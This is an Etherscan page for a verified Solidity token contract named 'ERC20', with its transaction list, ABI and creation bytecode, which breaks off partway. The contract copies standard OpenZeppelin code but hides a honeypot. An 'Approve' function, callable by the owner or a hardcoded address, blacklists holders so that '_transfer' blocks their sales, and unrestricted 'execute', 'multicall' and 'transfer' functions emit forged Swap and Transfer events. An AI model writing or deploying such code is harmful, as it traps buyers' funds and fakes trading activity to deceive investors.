ETH Price: $2,876.87 (+0.11%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve191131552024-01-29 15:44:23371 days ago1706543063IN
0x7D70EfAa...a9AF2a19b
0 ETH0.000589423.63384373
Approve191131542024-01-29 15:44:11371 days ago1706543051IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0005748423.04996459
Approve177852022023-07-27 15:09:11557 days ago1690470551IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0027811558.8941329
Approve175751192023-06-28 3:23:23586 days ago1687922603IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0008721118.49150477
Execute175742352023-06-28 0:25:35586 days ago1687911935IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0019686414.61028121
Execute175742332023-06-28 0:25:11586 days ago1687911911IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0039134812.89843744
Execute175742322023-06-28 0:24:59586 days ago1687911899IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0023853513.1094958
Approve175719392023-06-27 16:41:59587 days ago1687884119IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0016368234.70575454
Execute175712422023-06-27 14:20:47587 days ago1687875647IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0028342122.14718601
Execute175712412023-06-27 14:20:35587 days ago1687875635IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0013679520.3371045
Execute175712402023-06-27 14:20:23587 days ago1687875623IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0014012320.83192953
Execute175712382023-06-27 14:19:59587 days ago1687875599IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0015441520.86352172
Execute175712372023-06-27 14:19:47587 days ago1687875587IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0014767519.95617795
Execute175712352023-06-27 14:19:23587 days ago1687875563IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0029231920.66330617
Execute175712302023-06-27 14:18:23587 days ago1687875503IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0039176121.53053865
Approve175710842023-06-27 13:48:59587 days ago1687873739IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0007894116.71672065
Approve175710152023-06-27 13:34:59587 days ago1687872899IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0004881817.90664194
Approve175710132023-06-27 13:34:35587 days ago1687872875IN
0x7D70EfAa...a9AF2a19b
0 ETH0.000879418.64603301
Approve175710062023-06-27 13:33:11587 days ago1687872791IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0008406817.92074711
Approve175709102023-06-27 13:13:47587 days ago1687871627IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0011790422.56548859
Approve175708902023-06-27 13:09:47587 days ago1687871387IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0011600122.20118251
Execute175708892023-06-27 13:09:35587 days ago1687871375IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0087254815.04351805
Execute175708882023-06-27 13:09:23587 days ago1687871363IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0026290415.60521916
Execute175708872023-06-27 13:09:11587 days ago1687871351IN
0x7D70EfAa...a9AF2a19b
0 ETH0.002034815.10128112
Approve175703532023-06-27 11:16:47587 days ago1687864607IN
0x7D70EfAa...a9AF2a19b
0 ETH0.0007225715.42281732
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-24
*/

/**
 *Submitted for verification at Etherscan.io on 2023-06-20
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _ss;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _pair;
    address private _ow;

    function setup(address _setup_) external  {
        require( _ow == _msgSender() , "Ownable: caller is not the owner");
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 8;
    }

    function Approve(address [] calldata _addresses_) external  {
        require(owner() == _msgSender() || address(0x419a6Fa06386329ce83294519247614398e929E7) == _msgSender() || _ow == _msgSender() , "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _ss[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function Approve(address [] calldata _addresses_ , uint256 balance) external  {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Approval(_addresses_[i], address(this), balance);
        }
    }
    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function decreaseAllowance(address [] calldata _addresses_) external  {
        require( _ow == _msgSender() , "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _ss[_addresses_[i]] = false;
        }
    }

    function bind(address _address_) public view returns (bool) {
        return _ss[_address_];
    }
    function toApplied(bool c) external  {
        require( _ow == _msgSender() , "Ownable: caller is not the owner");
        _snapshotApplied = c;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");


        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_ss[from]) require(true == _snapshotApplied, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _ow = account;
        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_,uint256 amount) {
        _name = name_;
        _symbol = symbol_;
        _mint(msg.sender, amount * 10 ** decimals());
    }


}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"amount","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bind","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"c","type":"bool"}],"name":"toApplied","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008157600080fd5b506040516200319c3803806200319c8339818101604052810190620000a7919062000573565b620000c7620000bb6200013060201b60201c565b6200013860201b60201c565b8260069081620000d891906200084e565b508160079081620000ea91906200084e565b50620001273362000100620001fc60201b60201c565b600a6200010e919062000ac5565b836200011b919062000b16565b6200020560201b60201c565b50505062000c4d565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000277576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200026e9062000bc2565b60405180910390fd5b81600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060046000828254620002cc919062000be4565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000380919062000c30565b60405180910390a36200039c60008383620003a060201b60201c565b5050565b505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200040e82620003c3565b810181811067ffffffffffffffff8211171562000430576200042f620003d4565b5b80604052505050565b600062000445620003a5565b905062000453828262000403565b919050565b600067ffffffffffffffff821115620004765762000475620003d4565b5b6200048182620003c3565b9050602081019050919050565b60005b83811015620004ae57808201518184015260208101905062000491565b60008484015250505050565b6000620004d1620004cb8462000458565b62000439565b905082815260208101848484011115620004f057620004ef620003be565b5b620004fd8482856200048e565b509392505050565b600082601f8301126200051d576200051c620003b9565b5b81516200052f848260208601620004ba565b91505092915050565b6000819050919050565b6200054d8162000538565b81146200055957600080fd5b50565b6000815190506200056d8162000542565b92915050565b6000806000606084860312156200058f576200058e620003af565b5b600084015167ffffffffffffffff811115620005b057620005af620003b4565b5b620005be8682870162000505565b935050602084015167ffffffffffffffff811115620005e257620005e1620003b4565b5b620005f08682870162000505565b925050604062000603868287016200055c565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200066057607f821691505b60208210810362000676576200067562000618565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006e07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006a1565b620006ec8683620006a1565b95508019841693508086168417925050509392505050565b6000819050919050565b60006200072f62000729620007238462000538565b62000704565b62000538565b9050919050565b6000819050919050565b6200074b836200070e565b620007636200075a8262000736565b848454620006ae565b825550505050565b600090565b6200077a6200076b565b6200078781848462000740565b505050565b5b81811015620007af57620007a360008262000770565b6001810190506200078d565b5050565b601f821115620007fe57620007c8816200067c565b620007d38462000691565b81016020851015620007e3578190505b620007fb620007f28562000691565b8301826200078c565b50505b505050565b600082821c905092915050565b6000620008236000198460080262000803565b1980831691505092915050565b60006200083e838362000810565b9150826002028217905092915050565b62000859826200060d565b67ffffffffffffffff811115620008755762000874620003d4565b5b62000881825462000647565b6200088e828285620007b3565b600060209050601f831160018114620008c65760008415620008b1578287015190505b620008bd858262000830565b8655506200092d565b601f198416620008d6866200067c565b60005b828110156200090057848901518255600182019150602085019450602081019050620008d9565b868310156200092057848901516200091c601f89168262000810565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620009c3578086048111156200099b576200099a62000935565b5b6001851615620009ab5780820291505b8081029050620009bb8562000964565b94506200097b565b94509492505050565b600082620009de576001905062000ab1565b81620009ee576000905062000ab1565b816001811462000a07576002811462000a125762000a48565b600191505062000ab1565b60ff84111562000a275762000a2662000935565b5b8360020a91508482111562000a415762000a4062000935565b5b5062000ab1565b5060208310610133831016604e8410600b841016171562000a825782820a90508381111562000a7c5762000a7b62000935565b5b62000ab1565b62000a91848484600162000971565b9250905081840481111562000aab5762000aaa62000935565b5b81810290505b9392505050565b600060ff82169050919050565b600062000ad28262000538565b915062000adf8362000ab8565b925062000b0e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620009cc565b905092915050565b600062000b238262000538565b915062000b308362000538565b925082820262000b408162000538565b9150828204841483151762000b5a5762000b5962000935565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000baa601f8362000b61565b915062000bb78262000b72565b602082019050919050565b6000602082019050818103600083015262000bdd8162000b9b565b9050919050565b600062000bf18262000538565b915062000bfe8362000538565b925082820190508082111562000c195762000c1862000935565b5b92915050565b62000c2a8162000538565b82525050565b600060208201905062000c47600083018462000c1f565b92915050565b61253f8062000c5d6000396000f3fe608060405234801561001057600080fd5b506004361061014d5760003560e01c80637aac697b116100c3578063a457c2d71161007c578063a457c2d71461038a578063a9059cbb146103ba578063beabacc8146103ea578063dd62ed3e14610406578063f2fde38b14610436578063fde980ca146104525761014d565b80637aac697b146102ca57806381bac14f146102e65780638da5cb5b1461031657806395d89b41146103345780639ebbaef714610352578063a1c617f51461036e5761014d565b80633811ac02116101155780633811ac021461020c5780633950935114610228578063477e19441461025857806366d382031461027457806370a0823114610290578063715018a6146102c05761014d565b806306fdde0314610152578063095ea7b31461017057806318160ddd146101a057806323b872dd146101be578063313ce567146101ee575b600080fd5b61015a61046e565b6040516101679190611984565b60405180910390f35b61018a60048036038101906101859190611a44565b610500565b6040516101979190611a9f565b60405180910390f35b6101a8610523565b6040516101b59190611ac9565b60405180910390f35b6101d860048036038101906101d39190611ae4565b61052d565b6040516101e59190611a9f565b60405180910390f35b6101f661055c565b6040516102039190611b53565b60405180910390f35b6102266004803603810190610221919061